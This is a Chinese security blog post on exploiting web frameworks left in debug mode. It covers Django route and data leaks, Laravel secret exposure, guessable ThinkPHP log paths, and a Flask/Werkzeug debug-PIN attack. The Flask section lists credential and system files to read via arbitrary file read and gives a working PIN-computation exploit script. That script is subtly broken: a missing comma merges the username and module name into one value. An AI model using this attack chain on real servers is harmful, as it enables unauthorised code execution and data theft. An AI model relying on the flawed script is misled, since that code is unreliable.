

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/custom_logo.png">
  <link rel="icon" href="/img/custom_logo.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="rgba(71, 46, 98, 0.8)">
  <meta name="author" content="kyrie711-wq">
  <meta name="keywords" content="博客,技术,笔记">
  
    <meta name="description" content="实战攻防1-debug模式开启情景下的渗透思路Django Debug模式启动（pd项目场景）当 debug&#x3D;true 时，显示非标准的 404 Not Found 页面  添加任意路径进行测试，能发现所有api接口  随后进行遍历发现未授权  而且在test.html页面下发现生产环境信息，属于敏感信息泄露   有环境变量名，文件结构还有数据库名字，用户，被脱敏的密码 除此之外，很多框">
<meta property="og:type" content="article">
<meta property="og:title" content="实战攻防1-debug模式开启情景下的渗透思路">
<meta property="og:url" content="https://kyrie711-wq.github.io/2026/01/05/debug%E6%A8%A1%E5%BC%8F%E5%BC%80%E5%90%AF%E6%83%85%E6%99%AF%E4%B8%8B%E7%9A%84%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF/index.html">
<meta property="og:site_name" content="snowhy&#39;s blog">
<meta property="og:description" content="实战攻防1-debug模式开启情景下的渗透思路Django Debug模式启动（pd项目场景）当 debug&#x3D;true 时，显示非标准的 404 Not Found 页面  添加任意路径进行测试，能发现所有api接口  随后进行遍历发现未授权  而且在test.html页面下发现生产环境信息，属于敏感信息泄露   有环境变量名，文件结构还有数据库名字，用户，被脱敏的密码 除此之外，很多框">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://kyrie711-wq.github.io/img/image-20260105192906325.png">
<meta property="article:published_time" content="2026-01-04T16:00:00.000Z">
<meta property="article:modified_time" content="2026-02-22T05:58:15.153Z">
<meta property="article:author" content="kyrie711-wq">
<meta property="article:tag" content="Debug模式">
<meta property="article:tag" content="信息泄露">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="Django">
<meta property="article:tag" content="Laravel">
<meta property="article:tag" content="ThinkPHP">
<meta property="article:tag" content="Flask">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://kyrie711-wq.github.io/img/image-20260105192906325.png">
  
  
  
  <title>实战攻防1-debug模式开启情景下的渗透思路 - snowhy&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"kyrie711-wq.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>snowhy&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/%E5%AE%89%E5%85%A8%E9%A1%B9%E7%9B%AE/" target="_self">
                <i class="iconfont icon-app"></i>
                <span>安全项目</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" target="_self">
                <i class="iconfont icon-bug-fill"></i>
                <span>漏洞挖掘</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/CTF%E7%AB%9E%E8%B5%9B/" target="_self">
                <i class="iconfont icon-flag-fill"></i>
                <span>CTF竞赛</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/Web%E6%B8%97%E9%80%8F/" target="_self">
                <i class="iconfont icon-windows-fill"></i>
                <span>Web渗透</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/vdysjx.webp') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="实战攻防1-debug模式开启情景下的渗透思路"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-01-05 00:00" pubdate>
          January 5, 2026 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.1k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          9 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">实战攻防1-debug模式开启情景下的渗透思路</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="实战攻防1-debug模式开启情景下的渗透思路"><a href="#实战攻防1-debug模式开启情景下的渗透思路" class="headerlink" title="实战攻防1-debug模式开启情景下的渗透思路"></a>实战攻防1-debug模式开启情景下的渗透思路</h1><h2 id="Django-Debug模式启动（pd项目场景）"><a href="#Django-Debug模式启动（pd项目场景）" class="headerlink" title="Django Debug模式启动（pd项目场景）"></a>Django Debug模式启动（pd项目场景）</h2><p><strong>当 debug&#x3D;true 时，显示非标准的 404 Not Found 页面</strong></p>
<p><img src="/img/image-20260105192906325.png" srcset="/img/loading.gif" lazyload alt="Django Debug模式404页面"></p>
<p>添加任意路径进行测试，能发现所有api接口</p>
<p><img src="/img/image-20260105193449464.png" srcset="/img/loading.gif" lazyload alt="发现API接口"></p>
<p>随后进行遍历发现未授权</p>
<p><img src="/img/image-20260105193534199.png" srcset="/img/loading.gif" lazyload alt="未授权访问"></p>
<p>而且在test.html页面下发现生产环境信息，属于敏感信息泄露</p>
<p><img src="/img/image-20260105193628883.png" srcset="/img/loading.gif" lazyload alt="敏感信息泄露1"></p>
<p><img src="/img/image-20260105193641418.png" srcset="/img/loading.gif" lazyload alt="敏感信息泄露2"></p>
<p>有环境变量名，文件结构还有数据库名字，用户，被脱敏的密码</p>
<p>除此之外，很多框架的debug模式开启都会造成危害比如Laravel，ThinkPHP，flask</p>
<h2 id="Laravel-Debug模式启动"><a href="#Laravel-Debug模式启动" class="headerlink" title="Laravel Debug模式启动"></a>Laravel Debug模式启动</h2><p>这个框架信息泄露更严重，会直接把key，密钥，数据库密码明文泄露</p>
<p><img src="/img/image-20260105194700638.png" srcset="/img/loading.gif" lazyload alt="Laravel信息泄露"></p>
<h2 id="ThinkPHP-Debug模式启动"><a href="#ThinkPHP-Debug模式启动" class="headerlink" title="ThinkPHP Debug模式启动"></a>ThinkPHP Debug模式启动</h2><p>ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志。</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs gradle"><span class="hljs-regexp">/Runtime/</span>Logs/  <br><span class="hljs-regexp">/App/</span><span class="hljs-keyword">Runtime</span><span class="hljs-regexp">/Logs/</span><br><span class="hljs-regexp">/Application/</span><span class="hljs-keyword">Runtime</span><span class="hljs-regexp">/Logs/</span>Admin/<br><span class="hljs-regexp">/Application/</span><span class="hljs-keyword">Runtime</span><span class="hljs-regexp">/Logs/</span>Home/<br><span class="hljs-regexp">/Application/</span><span class="hljs-keyword">Runtime</span><span class="hljs-regexp">/Logs/</span>App/<br><span class="hljs-regexp">/Application/</span><span class="hljs-keyword">Runtime</span><span class="hljs-regexp">/Logs/</span>Ext/<br><span class="hljs-regexp">/Application/</span><span class="hljs-keyword">Runtime</span><span class="hljs-regexp">/Logs/</span>Api/<br><span class="hljs-regexp">/Application/</span><span class="hljs-keyword">Runtime</span><span class="hljs-regexp">/Logs/</span>Test/<br><span class="hljs-regexp">/Application/</span><span class="hljs-keyword">Runtime</span><span class="hljs-regexp">/Logs/</span>Common/<br><span class="hljs-regexp">/Application/</span><span class="hljs-keyword">Runtime</span><span class="hljs-regexp">/Logs/</span>Service/<br><span class="hljs-regexp">/Application/</span><span class="hljs-keyword">Runtime</span><span class="hljs-regexp">/Logs/</span><br>TP5：<br><span class="hljs-regexp">/runtime/</span>log/<br>日志格式如下： 时间戳前缀的log。<br>tp3<br><span class="hljs-number">19</span>_01_01.log<br><span class="hljs-number">1550651608</span>-<span class="hljs-number">19</span>_02_20.log<br>tp5<br><span class="hljs-regexp">/runtime/</span>log<span class="hljs-regexp">/201808/</span><span class="hljs-number">07</span>.log<br><span class="hljs-regexp">/runtime/</span>log<span class="hljs-regexp">/201808/</span><span class="hljs-number">07</span>_cli.log<br></code></pre></td></tr></table></figure>

<p>这样的话日志很容易被猜解到，而且日志里面有执行SQL语句的记录。</p>
<p><img src="/img/image-10-1024x422-1767698187398-7.png" srcset="/img/loading.gif" lazyload alt="ThinkPHP日志文件"></p>
<p>在日志中搜索password关键字，查找日志中的sql语句。</p>
<p><img src="/img/image-12-1024x584-1767698180667-5.png" srcset="/img/loading.gif" lazyload alt="搜索SQL语句"></p>
<h2 id="Flask-Debug模式开启"><a href="#Flask-Debug模式开启" class="headerlink" title="Flask Debug模式开启"></a>Flask Debug模式开启</h2><p>当flask页面报错时，会出现如下页面</p>
<p><img src="/img/t01316743c76f190c47.png" srcset="/img/loading.gif" lazyload alt="Flask Debug错误页面"></p>
<h3 id="1、旧版flask-debug模式无开启pin码验证"><a href="#1、旧版flask-debug模式无开启pin码验证" class="headerlink" title="1、旧版flask debug模式无开启pin码验证"></a>1、旧版flask debug模式无开启pin码验证</h3><p>可直接进入交互式的python shell 进行命令执行。</p>
<h3 id="2、较新的flask-debug模式开启了pin码验证"><a href="#2、较新的flask-debug模式开启了pin码验证" class="headerlink" title="2、较新的flask debug模式开启了pin码验证"></a>2、较新的flask debug模式开启了pin码验证</h3><p><img src="/img/t013a17d8b3cc1034c6.png" srcset="/img/loading.gif" lazyload alt="Flask Pin码验证"></p>
<p>如何计算得到pin码？</p>
<p>逐步调试找到了生成pin码的关键函数get_pin_and_cookie_name()，其源码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">get_pin_and_cookie_name</span>(<span class="hljs-params">app</span>):<br>    <span class="hljs-string">&quot;&quot;&quot;Given an application object this returns a semi-stable 9 digit pin</span><br><span class="hljs-string">    code and a random key.  The hope is that this is stable between</span><br><span class="hljs-string">    restarts to not make debugging particularly frustrating.  If the pin</span><br><span class="hljs-string">    was forcefully disabled this returns `None`.</span><br><span class="hljs-string"></span><br><span class="hljs-string">    Second item in the resulting tuple is the cookie name for remembering.</span><br><span class="hljs-string">    &quot;&quot;&quot;</span><br>    pin = os.environ.get(<span class="hljs-string">&quot;WERKZEUG_DEBUG_PIN&quot;</span>)<br>    rv = <span class="hljs-literal">None</span><br>    num = <span class="hljs-literal">None</span><br><br>    <span class="hljs-comment"># Pin was explicitly disabled</span><br>    <span class="hljs-keyword">if</span> pin == <span class="hljs-string">&quot;off&quot;</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span>, <span class="hljs-literal">None</span><br><br>    <span class="hljs-comment"># Pin was provided explicitly</span><br>    <span class="hljs-keyword">if</span> pin <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-literal">None</span> <span class="hljs-keyword">and</span> pin.replace(<span class="hljs-string">&quot;-&quot;</span>, <span class="hljs-string">&quot;&quot;</span>).isdigit():<br>        <span class="hljs-comment"># If there are separators in the pin, return it directly</span><br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;-&quot;</span> <span class="hljs-keyword">in</span> pin:<br>            rv = pin<br>        <span class="hljs-keyword">else</span>:<br>            num = pin<br><br>    modname = <span class="hljs-built_in">getattr</span>(app, <span class="hljs-string">&quot;__module__&quot;</span>, app.__class__.__module__)<br><br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-comment"># getuser imports the pwd module, which does not exist in Google</span><br>        <span class="hljs-comment"># App Engine. It may also raise a KeyError if the UID does not</span><br>        <span class="hljs-comment"># have a username, such as in Docker.</span><br>        username = getpass.getuser()<br>    <span class="hljs-keyword">except</span> (ImportError, KeyError):<br>        username = <span class="hljs-literal">None</span><br><br>    mod = sys.modules.get(modname)<br><br>    <span class="hljs-comment"># This information only exists to make the cookie unique on the</span><br>    <span class="hljs-comment"># computer, not as a security feature.</span><br>    probably_public_bits = [<br>        username, <br>        modname, <br>        <span class="hljs-built_in">getattr</span>(app, <span class="hljs-string">&quot;__name__&quot;</span>, app.__class__.__name__),<br>        <span class="hljs-built_in">getattr</span>(mod, <span class="hljs-string">&quot;__file__&quot;</span>, <span class="hljs-literal">None</span>),<br>    ]<br><br>    <span class="hljs-comment"># This information is here to make it harder for an attacker to</span><br>    <span class="hljs-comment"># guess the cookie name.  They are unlikely to be contained anywhere</span><br>    <span class="hljs-comment"># within the unauthenticated debug page.</span><br>    private_bits = [<span class="hljs-built_in">str</span>(uuid.getnode()), get_machine_id()]<br><br><br>    h = hashlib.md5()<br>    <span class="hljs-keyword">for</span> bit <span class="hljs-keyword">in</span> chain(probably_public_bits, private_bits):<br>        <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> bit:<br>            <span class="hljs-keyword">continue</span><br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(bit, text_type):<br>            bit = bit.encode(<span class="hljs-string">&quot;utf-8&quot;</span>)<br>        h.update(bit)<br>    h.update(<span class="hljs-string">b&quot;cookiesalt&quot;</span>)<br><br>    cookie_name = <span class="hljs-string">&quot;__wzd&quot;</span> + h.hexdigest()[:<span class="hljs-number">20</span>]<br><br>    <span class="hljs-comment"># If we need to generate a pin we salt it a bit more so that we don&#x27;t</span><br>    <span class="hljs-comment"># end up with the same value and generate out 9 digits</span><br>    <span class="hljs-keyword">if</span> num <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>        h.update(<span class="hljs-string">b&quot;pinsalt&quot;</span>)<br>        num = (<span class="hljs-string">&quot;%09d&quot;</span> % <span class="hljs-built_in">int</span>(h.hexdigest(), <span class="hljs-number">16</span>))[:<span class="hljs-number">9</span>]<br><br>    <span class="hljs-comment"># Format the pincode in groups of digits for easier remembering if</span><br>    <span class="hljs-comment"># we don&#x27;t have a result yet.</span><br>    <span class="hljs-keyword">if</span> rv <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>        <span class="hljs-keyword">for</span> group_size <span class="hljs-keyword">in</span> <span class="hljs-number">5</span>, <span class="hljs-number">4</span>, <span class="hljs-number">3</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(num) % group_size == <span class="hljs-number">0</span>:<br>                rv = <span class="hljs-string">&quot;-&quot;</span>.join(<br>                    num[x : x + group_size].rjust(group_size, <span class="hljs-string">&quot;0&quot;</span>)<br>                    <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(num), group_size)<br>                )<br>                <span class="hljs-keyword">break</span><br>        <span class="hljs-keyword">else</span>:<br>            rv = num<br><br>    <span class="hljs-keyword">return</span> rv, cookie_name<br></code></pre></td></tr></table></figure>

<p>最后返回的rv即最终输出的pin码，用于生成pin的关键代码在其中的52~59行，这部分代码利用了probably_public_bits和private_bits两个参数来参与hash运算，这两个参数是两个列表，分别由这些元素组成：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python">probably_public_bits = [<br>        username, <span class="hljs-comment">#root</span><br>        modname,  <span class="hljs-comment">#flask.app</span><br>        <span class="hljs-built_in">getattr</span>(app, <span class="hljs-string">&quot;__name__&quot;</span>, app.__class__.__name__), <span class="hljs-comment">#Flask</span><br>        <span class="hljs-built_in">getattr</span>(mod, <span class="hljs-string">&quot;__file__&quot;</span>, <span class="hljs-literal">None</span>), <span class="hljs-comment">#/usr/local/lib/python2.7/dist-packages/flask/app.pyc</span><br>    ]<br><br>private_bits = [<span class="hljs-built_in">str</span>(uuid.getnode()), get_machine_id()]<br></code></pre></td></tr></table></figure>

<p>打印变量，调试过程如下</p>
<p><strong>modname</strong></p>
<p><img src="/img/pwQUlyC-1767785488522-5.png" srcset="/img/loading.gif" lazyload alt="modname调试"></p>
<p><strong>username</strong></p>
<p><img src="/img/U4XV3RA.png" srcset="/img/loading.gif" lazyload alt="username调试"></p>
<p><code>getattr(app, &quot;__name__&quot;, app.__class__.__name__)</code> 的结果就是Flask，不会变</p>
<p><strong>getattr(mod, “<strong>file</strong>“, None)</strong> 其值为flask目录下的一个app.py的绝对路径</p>
<p><img src="/img/oGx16WZ.png" srcset="/img/loading.gif" lazyload alt="文件路径"></p>
<p><strong>private_bits</strong></p>
<p><img src="/img/1iYT0UI.png" srcset="/img/loading.gif" lazyload alt="private_bits调试"></p>
<p><strong>probably_public_bits</strong></p>
<p><img src="/img/7tV90u4.png" srcset="/img/loading.gif" lazyload alt="probably_public_bits调试"></p>
<p><strong>num</strong></p>
<p><img src="/img/4RovuiC.png" srcset="/img/loading.gif" lazyload alt="num调试"></p>
<p><strong>rv</strong></p>
<p><img src="/img/VYL2UoV.png" srcset="/img/loading.gif" lazyload alt="rv调试"></p>
<p>那么想要生成pin码就需要以下几种要素：</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs dts"><span class="hljs-symbol">username:</span>通过getpass.getuser()读取，通过文件读取<span class="hljs-keyword">/etc/</span>passwd<br><span class="hljs-symbol">modname:</span>默认就是flask.app,通过getattr(mod,<span class="hljs-string">&quot;file&quot;</span>,None)读取<br><span class="hljs-symbol">appname:</span>默认Flask,通过getattr(app,<span class="hljs-string">&quot;name&quot;</span>,type(app).name)读取<br><span class="hljs-symbol">moddir:</span>值为flask目录下的app.pyc的绝对路径，通过getattr(mod, <span class="hljs-string">&quot;__file__&quot;</span>, None)<br><span class="hljs-symbol">uuidnode:</span>当前网络mac地址的十进制值，通过<span class="hljs-keyword">/sys/</span>class<span class="hljs-keyword">/net/</span>eth0/address读取<br><span class="hljs-symbol">machine_id:</span>由三个合并(docker环境为后两个):<span class="hljs-number">1.</span><span class="hljs-keyword">/etc/</span>machine-id <span class="hljs-number">2.</span><span class="hljs-keyword">/proc/</span>sys<span class="hljs-keyword">/kernel/</span>random/boot_id <span class="hljs-number">3.</span><span class="hljs-keyword">/proc/</span>self/cgroup<br></code></pre></td></tr></table></figure>

<p>最后利用exp计算pin码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> hashlib<br><span class="hljs-keyword">from</span> itertools <span class="hljs-keyword">import</span> chain<br>probably_public_bits = [<br>    <span class="hljs-string">&#x27;root&#x27;</span><span class="hljs-comment"># username</span><br>    <span class="hljs-string">&#x27;flask.app&#x27;</span>,<span class="hljs-comment"># modname</span><br>    <span class="hljs-string">&#x27;Flask&#x27;</span>,<span class="hljs-comment"># getattr(app, &#x27;__name__&#x27;, getattr(app.__class__, &#x27;__name__&#x27;))</span><br>    <span class="hljs-string">&#x27;/usr/local/lib/python2.7/dist-packages/flask/app.pyc&#x27;</span> <span class="hljs-comment"># getattr(mod, &#x27;__file__&#x27;, None),</span><br>]<br><br>private_bits = [<br>    <span class="hljs-string">&#x27;274973438824773&#x27;</span>,<span class="hljs-comment"># str(uuid.getnode()),  /sys/class/net/ens33/address</span><br>    <span class="hljs-string">&#x27;f855a4d03e8442aa92d2813dfc0bf8c3&#x27;</span><span class="hljs-comment"># get_machine_id(), /etc/machine-id</span><br>]<br><br>h = hashlib.md5()<br><span class="hljs-keyword">for</span> bit <span class="hljs-keyword">in</span> chain(probably_public_bits, private_bits):<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> bit:<br>        <span class="hljs-keyword">continue</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(bit, <span class="hljs-built_in">str</span>):<br>        bit = bit.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>    h.update(bit)<br>h.update(<span class="hljs-string">b&#x27;cookiesalt&#x27;</span>)<br><br>cookie_name = <span class="hljs-string">&#x27;__wzd&#x27;</span> + h.hexdigest()[:<span class="hljs-number">20</span>]<br><br>num = <span class="hljs-literal">None</span><br><span class="hljs-keyword">if</span> num <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>    h.update(<span class="hljs-string">b&#x27;pinsalt&#x27;</span>)<br>    num = (<span class="hljs-string">&#x27;%09d&#x27;</span> % <span class="hljs-built_in">int</span>(h.hexdigest(), <span class="hljs-number">16</span>))[:<span class="hljs-number">9</span>]<br><br>rv =<span class="hljs-literal">None</span><br><span class="hljs-keyword">if</span> rv <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>    <span class="hljs-keyword">for</span> group_size <span class="hljs-keyword">in</span> <span class="hljs-number">5</span>, <span class="hljs-number">4</span>, <span class="hljs-number">3</span>:<br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(num) % group_size == <span class="hljs-number">0</span>:<br>            rv = <span class="hljs-string">&#x27;-&#x27;</span>.join(num[x:x + group_size].rjust(group_size, <span class="hljs-string">&#x27;0&#x27;</span>)<br>                          <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(num), group_size))<br>            <span class="hljs-keyword">break</span><br>    <span class="hljs-keyword">else</span>:<br>        rv = num<br><br><span class="hljs-built_in">print</span>(rv)<br></code></pre></td></tr></table></figure>

<h2 id="利用步骤"><a href="#利用步骤" class="headerlink" title="利用步骤"></a>利用步骤</h2><ol>
<li>一般都是需要通过任意文件读取读取到生成pin码private_bits()所需要的2个参数值。</li>
<li>通过debug报错代码获取到public_bits()所需要的4个参数值。</li>
<li>然后使用payload计算出pin</li>
</ol>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
